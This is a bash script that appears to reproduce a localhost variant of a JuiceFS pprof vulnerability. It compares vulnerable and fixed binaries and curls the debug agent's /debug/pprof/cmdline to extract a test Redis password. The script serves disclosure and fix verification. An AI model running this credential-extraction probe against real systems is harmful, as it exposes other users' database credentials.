#!/bin/bash
set -euo pipefail

# ============================================================================
# CVE-2026-59092 VARIANT: JuiceFS debug agent still exposes pprof via
# DefaultServeMux AFTER the fix (localhost-only residual / fix-coverage gap)
# ============================================================================
# The official fix (commit a46979cdd4082217081ee99b931ddc53d038e47a, PR #7214)
# only replaced the shared DefaultServeMux with a dedicated ServeMux in THREE
# places:
#   - cmd/mount.go            exposeMetrics()        (metrics port)
#   - pkg/fs/http.go          StartHTTPServer()      (WebDAV port)
#   - pkg/sync/cluster.go     startManager()         (sync cluster manager port)
#
# It did NOT touch the *debug agent* started in cmd/main.go:336:
#
#     if !c.Bool("no-agent") {
#         go debugAgentOnce.Do(func() {
#             for port := 6060; port < 6100; port++ {
#                 debugAgent = fmt.Sprintf("127.0.0.1:%d", port)
#                 _ = http.ListenAndServe(debugAgent, nil)   // <-- DefaultServeMux
#             }
#         })
#     }
#
# Because `_ "net/http/pprof"` is imported in cmd/main.go, the pprof handlers
# (including /debug/pprof/cmdline) are registered on DefaultServeMux, and the
# debug agent serves them with a `nil` handler. So on the FIXED version, the
# metrics port correctly returns 404 for pprof, BUT the debug agent port
# (127.0.0.1:6060+) STILL returns 200 for /debug/pprof/cmdline and leaks the
# full process command line, including the metadata engine URL with DB creds.
#
# The debug agent is hardcoded to 127.0.0.1 (no flag makes it bind to 0.0.0.0),
# so this is NOT a remote bypass of the original CVE (which targeted the
# remotely-bindable metrics port). It IS a distinct same-root-cause variant on
# a localhost surface that the fix left uncovered -> a local-hardening /
# fix-coverage gap. A co-located local user (or an SSRF from a co-located web
# service) can still extract metadata credentials from a *fixed* JuiceFS
# process that was not started with --no-agent.
#
# A second, identical residual exists in the Java SDK native lib:
#   sdk/java/libjfs/main.go:573  http.ListenAndServe("127.0.0.1:%d", nil)
# (gated by jConf.Debug || JUICEFS_DEBUG env). Same root cause, same sink.
#
# Exit code:
#   0 = variant reproduced on the FIXED version (debug agent leaks creds) ->
#       fix-coverage gap confirmed.
#   1 = debug agent does NOT leak on the fixed version, or no variant found.
# ============================================================================

# Portable paths - works from any directory
ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
VARIANT_DIR="$ROOT/vuln_variant"
mkdir -p "$LOGS" "$VARIANT_DIR"

# Locate the project cache (built binaries + repo) so we reuse, not rebuild.
PROJECT_CACHE_DIR=""
if [ -f "$ROOT/project_cache_context.json" ]; then
    PREPARED=$(python3 -c "import json; d=json.load(open('$ROOT/project_cache_context.json')); print(d.get('prepared', False))" 2>/dev/null || echo "False")
    if [ "$PREPARED" = "True" ]; then
        PROJECT_CACHE_DIR=$(python3 -c "import json; d=json.load(open('$ROOT/project_cache_context.json')); print(d.get('project_cache_dir', ''))" 2>/dev/null || echo "")
    fi
fi
if [ -z "$PROJECT_CACHE_DIR" ] || [ ! -d "$PROJECT_CACHE_DIR" ]; then
    echo "ERROR: project cache not prepared; repro binaries unavailable."
    exit 1
fi

REPO_DIR="$PROJECT_CACHE_DIR/repo"
VULN_BIN="$PROJECT_CACHE_DIR/juicefs-vuln"
FIXED_BIN="$PROJECT_CACHE_DIR/juicefs-fixed"
FIXED_COMMIT="a46979cdd4082217081ee99b931ddc53d038e47a"
VULN_COMMIT="f60a90fc0ad52d2bb1f44f38a04d55044fc91d50"

for b in "$VULN_BIN" "$FIXED_BIN"; do
    if [ ! -x "$b" ]; then
        echo "ERROR: missing built binary: $b"
        exit 1
    fi
done

# Record exact tested source identity of the fixed target.
mkdir -p "$LOGS/vuln_variant"
{
    echo "fixed_commit=${FIXED_COMMIT}"
    cd "$REPO_DIR" 2>/dev/null && echo "fixed_git_rev_parse=$(git rev-parse HEAD 2>/dev/null)"
    echo "fixed_binary=$FIXED_BIN"
    echo "vuln_commit=${VULN_COMMIT}"
    echo "vuln_binary=$VULN_BIN"
} > "$LOGS/vuln_variant/fixed_version.txt"

REDIS_PASSWORD="s3cr3tPass"
REDIS_PORT=6379
REDIS_DB=1
META_URL="redis://:${REDIS_PASSWORD}@127.0.0.1:${REDIS_PORT}/${REDIS_DB}"
STORAGE_DIR="/tmp/jfs-storage-variant"
METRICS_PORT_VULN=9577
METRICS_PORT_FIXED=9578
GW_PORT_VULN=9100
GW_PORT_FIXED=9101

export MINIO_ROOT_USER=admin
export MINIO_ROOT_PASSWORD=12345678

echo "============================================================"
echo "CVE-2026-59092 VARIANT: debug agent pprof exposure (post-fix)"
echo "============================================================"
echo "Vulnerable commit: $VULN_COMMIT"
echo "Fixed commit:      $FIXED_COMMIT"
echo "VULN binary:       $VULN_BIN"
echo "FIXED binary:      $FIXED_BIN"
echo ""

# --- Helpers --------------------------------------------------------------

# Wait until nothing is listening on the given TCP port (up to ~20s).
wait_port_free() {
    local port="$1"
    for i in $(seq 1 30); do
        if ! (ss -ltn 2>/dev/null || netstat -ltn 2>/dev/null) | grep -qE "[:.]${port} "; then
            return 0
        fi
        sleep 1
    done
    echo "WARN: port ${port} still in use after 20s" >&2
}

# Kill every juicefs gateway process and wait for all our test ports to free.
global_cleanup() {
    pkill -9 -f "$VULN_BIN" 2>/dev/null || true; pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
    sleep 1
    for port in 6060 6061 6062 6063 9577 9578 9100 9101; do
        wait_port_free "$port"
    done
}

ensure_redis() {
    if redis-cli -a "$REDIS_PASSWORD" ping 2>/dev/null | grep -q PONG; then
        echo "Redis already running (auth OK)."
        return 0
    fi
    # Try to start it.
    pkill redis-server 2>/dev/null || true
    sleep 1
    redis-server --port "$REDIS_PORT" --requirepass "$REDIS_PASSWORD" \
        --daemonize yes --logfile "$LOGS/vuln_variant/redis.log" --dir /tmp 2>&1 || true
    sleep 2
    if redis-cli -a "$REDIS_PASSWORD" ping 2>/dev/null | grep -q PONG; then
        echo "Redis started (auth OK)."
        return 0
    fi
    echo "ERROR: Redis unavailable."
    return 1
}

# Find the debug agent: scan 127.0.0.1 ports 6060-6099 for one that answers
# /debug/pprof/cmdline. Echoes the port (empty if none).
find_debug_agent_port() {
    for p in $(seq 6060 6099); do
        code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 1 \
            "http://127.0.0.1:${p}/debug/pprof/cmdline" 2>/dev/null || echo "000")
        if [ "$code" = "200" ]; then
            echo "$p"
            return 0
        fi
    done
    echo ""
}

# Probe a debug-agent port for credential leakage.
# $1 = port, $2 = label, $3 = outfile
# Prints diagnostics to stderr; echoes ONLY "yes"/"no"/"notfound" to stdout.
probe_cmdline() {
    local port="$1" label="$2" outfile="$3"
    if [ -z "$port" ]; then
        echo "[$label] debug agent: NOT FOUND on 127.0.0.1:6060-6099" >&2
        echo "NOT_FOUND" > "$outfile"
        echo "notfound"
        return
    fi
    local code
    code=$(curl -s -o "$outfile" -w "%{http_code}" --max-time 3 \
        "http://127.0.0.1:${port}/debug/pprof/cmdline" 2>/dev/null || true)
    [ -z "$code" ] && code="000"
    echo "[$label] debug agent on 127.0.0.1:${port} -> /debug/pprof/cmdline HTTP $code" >&2
    if grep -q "$REDIS_PASSWORD" "$outfile" 2>/dev/null; then
        echo "[$label] CONFIRMED: Redis password '$REDIS_PASSWORD' leaked via debug agent /debug/pprof/cmdline" >&2
        echo "yes"
    else
        echo "[$label] password NOT leaked via debug agent cmdline" >&2
        echo "no"
    fi
}

# Test whether the debug agent is reachable from a NON-loopback address.
# Diagnostics to stderr; echoes ONLY "reachable"/"loopback_only"/"no_nonloopback_iface" to stdout.
test_remote_reachability() {
    local port="$1"
    local hostip
    hostip=$(ip -4 -o addr show scope global 2>/dev/null | awk '{print $4}' | head -1 | cut -d/ -f1 || true)
    if [ -z "$hostip" ]; then
        hostip=$(hostname -I 2>/dev/null | awk '{print $1}' || true)
    fi
    if [ -z "$hostip" ]; then
        echo "no_nonloopback_iface"
        return
    fi
    local code
    code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 2 \
        "http://${hostip}:${port}/debug/pprof/cmdline" 2>/dev/null || true)
    [ -z "$code" ] && code="000"
    echo "debug agent reachability from non-loopback ${hostip}:${port} -> HTTP $code" >&2
    if [ "$code" = "200" ]; then
        echo "reachable"
    else
        echo "loopback_only"
    fi
}

# --- Setup ----------------------------------------------------------------
global_cleanup
ensure_redis || exit 1

mkdir -p "$STORAGE_DIR"
# Format volume (idempotent: re-formatting an existing volume is fine for redis db 1)
"$VULN_BIN" format --storage file --bucket "$STORAGE_DIR/" "$META_URL" variantvol \
    > "$LOGS/vuln_variant/format.log" 2>&1 || true
echo "Volume formatted (or already exists)."
echo ""

# ===========================================================================
# TEST 1: VULNERABLE version - metrics pprof (baseline) + debug agent
# ===========================================================================
echo "============================================================"
echo "TEST 1: VULNERABLE version ($VULN_COMMIT)"
echo "============================================================"
pkill -9 -f "$VULN_BIN" 2>/dev/null || true; pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
wait_port_free 9577; wait_port_free 9100
sleep 1

nohup "$VULN_BIN" gateway "$META_URL" "localhost:${GW_PORT_VULN}" \
    --metrics "0.0.0.0:${METRICS_PORT_VULN}" --no-banner \
    > "$LOGS/vuln_variant/gateway-vuln.log" 2>&1 &
VULN_PID=$!
echo "Vulnerable gateway PID: $VULN_PID (debug agent enabled, --no-agent NOT passed)"

# Wait for metrics endpoint
for i in $(seq 1 30); do
    sleep 1
    if curl -s -o /dev/null -w "%{http_code}" "http://127.0.0.1:${METRICS_PORT_VULN}/metrics" 2>/dev/null | grep -q "200"; then
        echo "Vulnerable gateway ready."
        break
    fi
    if ! kill -0 "$VULN_PID" 2>/dev/null; then
        echo "ERROR: vulnerable gateway died"; tail -20 "$LOGS/vuln_variant/gateway-vuln.log"; exit 1
    fi
    [ $i -eq 30 ] && { echo "ERROR: vulnerable gateway not ready"; exit 1; }
done

# Baseline: metrics port pprof (should be 200 on VULNERABLE - the original CVE)
VULN_METRICS_PPROF=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
    "http://127.0.0.1:${METRICS_PORT_VULN}/debug/pprof/cmdline" 2>/dev/null || echo "000")
echo "[VULN] metrics port :${METRICS_PORT_VULN}/debug/pprof/cmdline -> HTTP $VULN_METRICS_PPROF (expect 200 = original CVE surface)"

# Give the debug agent goroutine a moment to bind, then find it.
sleep 1
VULN_DEBUG_PORT=$(find_debug_agent_port)
VULN_DEBUG_LEAK=$(probe_cmdline "$VULN_DEBUG_PORT" "VULN" "$LOGS/vuln_variant/vuln-debugagent-cmdline.txt")
echo "[VULN] debug agent credential leak: $VULN_DEBUG_LEAK"

# Save raw cmdline (NUL -> newline) for evidence
if [ -f "$LOGS/vuln_variant/vuln-debugagent-cmdline.txt" ] && [ "$(head -c4 "$LOGS/vuln_variant/vuln-debugagent-cmdline.txt" 2>/dev/null)" != "NOT_" ]; then
    echo "[$VULN_COMMIT debug agent cmdline args]:" | tee "$LOGS/vuln_variant/vuln-debugagent-cmdline-pretty.txt"
    tr '\0' '\n' < "$LOGS/vuln_variant/vuln-debugagent-cmdline.txt" | tee -a "$LOGS/vuln_variant/vuln-debugagent-cmdline-pretty.txt"
fi

kill "$VULN_PID" 2>/dev/null || true
wait "$VULN_PID" 2>/dev/null || true
sleep 2
echo ""

# ===========================================================================
# TEST 2: FIXED version - metrics pprof (should be 404) + debug agent (variant)
# ===========================================================================
echo "============================================================"
echo "TEST 2: FIXED version ($FIXED_COMMIT)"
echo "============================================================"
pkill -9 -f "$VULN_BIN" 2>/dev/null || true; pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
wait_port_free 9578; wait_port_free 9101
sleep 1

nohup "$FIXED_BIN" gateway "$META_URL" "localhost:${GW_PORT_FIXED}" \
    --metrics "0.0.0.0:${METRICS_PORT_FIXED}" --no-banner \
    > "$LOGS/vuln_variant/gateway-fixed.log" 2>&1 &
FIXED_PID=$!
echo "Fixed gateway PID: $FIXED_PID (debug agent enabled, --no-agent NOT passed)"

for i in $(seq 1 30); do
    sleep 1
    if curl -s -o /dev/null -w "%{http_code}" "http://127.0.0.1:${METRICS_PORT_FIXED}/metrics" 2>/dev/null | grep -q "200"; then
        echo "Fixed gateway ready."
        break
    fi
    if ! kill -0 "$FIXED_PID" 2>/dev/null; then
        echo "ERROR: fixed gateway died"; tail -20 "$LOGS/vuln_variant/gateway-fixed.log"; exit 1
    fi
    [ $i -eq 30 ] && { echo "ERROR: fixed gateway not ready"; exit 1; }
done

# Fixed metrics port pprof (should be 404 = fix works on the metrics surface)
FIXED_METRICS_PPROF=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
    "http://127.0.0.1:${METRICS_PORT_FIXED}/debug/pprof/cmdline" 2>/dev/null || echo "000")
echo "[FIXED] metrics port :${METRICS_PORT_FIXED}/debug/pprof/cmdline -> HTTP $FIXED_METRICS_PPROF (expect 404 = fix covers metrics surface)"

# Fixed metrics still serves /metrics (regression check)
FIXED_METRICS_OK=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
    "http://127.0.0.1:${METRICS_PORT_FIXED}/metrics" 2>/dev/null || echo "000")
echo "[FIXED] metrics port /metrics -> HTTP $FIXED_METRICS_OK (expect 200 = no regression)"

sleep 1
FIXED_DEBUG_PORT=$(find_debug_agent_port)
FIXED_DEBUG_LEAK=$(probe_cmdline "$FIXED_DEBUG_PORT" "FIXED" "$LOGS/vuln_variant/fixed-debugagent-cmdline.txt")
echo "[FIXED] debug agent credential leak: $FIXED_DEBUG_LEAK"

if [ -f "$LOGS/vuln_variant/fixed-debugagent-cmdline.txt" ] && [ "$(head -c4 "$LOGS/vuln_variant/fixed-debugagent-cmdline.txt" 2>/dev/null)" != "NOT_" ]; then
    echo "[$FIXED_COMMIT debug agent cmdline args]:" | tee "$LOGS/vuln_variant/fixed-debugagent-cmdline-pretty.txt"
    tr '\0' '\n' < "$LOGS/vuln_variant/fixed-debugagent-cmdline.txt" | tee -a "$LOGS/vuln_variant/fixed-debugagent-cmdline-pretty.txt"
fi

# Reachability: is the fixed debug agent reachable from a non-loopback IP?
if [ -n "$FIXED_DEBUG_PORT" ]; then
    FIXED_REACHABILITY=$(test_remote_reachability "$FIXED_DEBUG_PORT")
    echo "[FIXED] $FIXED_REACHABILITY"
else
    FIXED_REACHABILITY="no_debug_agent"
fi

# Also enumerate other pprof endpoints on the fixed debug agent (state leak / DoS surface)
if [ -n "$FIXED_DEBUG_PORT" ]; then
    echo ""
    echo "[FIXED] other pprof endpoints on debug agent 127.0.0.1:${FIXED_DEBUG_PORT}:"
    for ep in "/" "heap" "goroutine" "profile" "allocs" "threadcreate" "block"; do
        code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
            "http://127.0.0.1:${FIXED_DEBUG_PORT}/debug/pprof/${ep}" 2>/dev/null || true)
        [ -z "$code" ] && code="000"
        echo "    /debug/pprof/${ep}: HTTP $code"
    done
fi

kill "$FIXED_PID" 2>/dev/null || true
wait "$FIXED_PID" 2>/dev/null || true
sleep 2

# ===========================================================================
# TEST 3: FIXED version WITH --no-agent (proves the residual is disableable)
# ===========================================================================
echo ""
echo "============================================================"
echo "TEST 3: FIXED version WITH --no-agent (mitigation check)"
echo "============================================================"
pkill -9 -f "$VULN_BIN" 2>/dev/null || true; pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
wait_port_free 9578; wait_port_free 9101
sleep 1
nohup "$FIXED_BIN" gateway "$META_URL" "localhost:${GW_PORT_FIXED}" \
    --metrics "0.0.0.0:${METRICS_PORT_FIXED}" --no-banner --no-agent \
    > "$LOGS/vuln_variant/gateway-fixed-noagent.log" 2>&1 &
NOAGENT_PID=$!
for i in $(seq 1 30); do
    sleep 1
    if curl -s -o /dev/null -w "%{http_code}" "http://127.0.0.1:${METRICS_PORT_FIXED}/metrics" 2>/dev/null | grep -q "200"; then
        echo "Fixed (--no-agent) gateway ready."; break
    fi
    if ! kill -0 "$NOAGENT_PID" 2>/dev/null; then
        echo "ERROR: fixed --no-agent gateway died"; tail -20 "$LOGS/vuln_variant/gateway-fixed-noagent.log"; break
    fi
    [ $i -eq 30 ] && { echo "ERROR: fixed --no-agent gateway not ready"; break; }
done
sleep 1
NOAGENT_DEBUG_PORT=$(find_debug_agent_port)
if [ -z "$NOAGENT_DEBUG_PORT" ]; then
    echo "[FIXED --no-agent] debug agent NOT listening on 127.0.0.1:6060-6099 (good: --no-agent disables it)"
    NOAGENT_RESULT="disabled"
else
    echo "[FIXED --no-agent] WARNING: debug agent still found on port $NOAGENT_DEBUG_PORT"
    NOAGENT_RESULT="still_running"
fi
kill "$NOAGENT_PID" 2>/dev/null || true
wait "$NOAGENT_PID" 2>/dev/null || true
sleep 1

# --- Verdict --------------------------------------------------------------
echo ""
echo "============================================================"
echo "VARIANT VERIFICATION SUMMARY"
echo "============================================================"
echo "VULN metrics pprof:    HTTP $VULN_METRICS_PPROF (original CVE surface)"
echo "VULN debug agent leak: $VULN_DEBUG_LEAK  (port ${VULN_DEBUG_PORT:-none})"
echo "FIXED metrics pprof:   HTTP $FIXED_METRICS_PPROF (fix covers metrics -> expect 404)"
echo "FIXED metrics ok:      HTTP $FIXED_METRICS_OK (no regression -> expect 200)"
echo "FIXED debug agent leak:$FIXED_DEBUG_LEAK  (port ${FIXED_DEBUG_PORT:-none})"
echo "FIXED debug agent reach: $FIXED_REACHABILITY (expect loopback_only)"
echo "FIXED --no-agent:       $NOAGENT_RESULT (expect disabled)"
echo ""

VARIANT_ON_FIXED=false
if [ "$FIXED_DEBUG_LEAK" = "yes" ]; then
    VARIANT_ON_FIXED=true
    echo "RESULT: DISTINCT VARIANT CONFIRMED ON FIXED VERSION"
    echo "  - The fix (commit $FIXED_COMMIT) does NOT cover the debug agent."
    echo "  - cmd/main.go:336 still serves DefaultServeMux (nil handler) on 127.0.0.1:6060+."
    echo "  - /debug/pprof/cmdline STILL leaks metadata credentials on the FIXED binary."
    echo "  - Surface is localhost-only (not a remote bypass of the original CVE),"
    echo "    but it is a local-hardening / fix-coverage gap (co-located user / SSRF)."
else
    echo "RESULT: NO VARIANT on fixed version (debug agent does not leak)."
fi

# Write a machine-readable runtime evidence file for downstream encoding.
VARIANT_ON_FIXED_JSON="false"
[ "$VARIANT_ON_FIXED" = "true" ] && VARIANT_ON_FIXED_JSON="true"
LEAK_BOOL() { [ "$1" = "yes" ] && echo "true" || echo "false"; }
export VARIANT_ON_FIXED_JSON
export VULN_METRICS_PPROF VULN_DEBUG_LEAK VULN_DEBUG_PORT
export FIXED_METRICS_PPROF FIXED_METRICS_OK FIXED_DEBUG_LEAK FIXED_DEBUG_PORT
export FIXED_REACHABILITY NOAGENT_RESULT FIXED_COMMIT VULN_COMMIT
python3 - <<'PYEOF2' > "$VARIANT_DIR/variant_runtime_result.json"
import json, os
def b(v): return v == "true"
g = os.environ.get
print(json.dumps({
  "variant_on_fixed": b(g("VARIANT_ON_FIXED_JSON", "false")),
  "vuln_commit": g("VULN_COMMIT", ""),
  "fixed_commit": g("FIXED_COMMIT", ""),
  "vuln_metrics_pprof": g("VULN_METRICS_PPROF", ""),
  "vuln_debug_agent_leak": g("VULN_DEBUG_LEAK", "") == "yes",
  "vuln_debug_port": g("VULN_DEBUG_PORT", ""),
  "fixed_metrics_pprof": g("FIXED_METRICS_PPROF", ""),
  "fixed_metrics_ok": g("FIXED_METRICS_OK", ""),
  "fixed_debug_agent_leak": g("FIXED_DEBUG_LEAK", "") == "yes",
  "fixed_debug_port": g("FIXED_DEBUG_PORT", ""),
  "fixed_debug_reachability": g("FIXED_REACHABILITY", ""),
  "fixed_noagent_result": g("NOAGENT_RESULT", "")
}, indent=2))
PYEOF2
echo "Runtime evidence written to $VARIANT_DIR/variant_runtime_result.json"


# Cleanup
pkill -9 -f "$VULN_BIN" 2>/dev/null || true; pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
pkill redis-server 2>/dev/null || true

echo ""
if [ "$VARIANT_ON_FIXED" = "true" ]; then
    echo "=== Variant reproduced on FIXED version (fix-coverage gap) ==="
    exit 0
else
    echo "=== No variant reproduced on fixed version ==="
    exit 1
fi
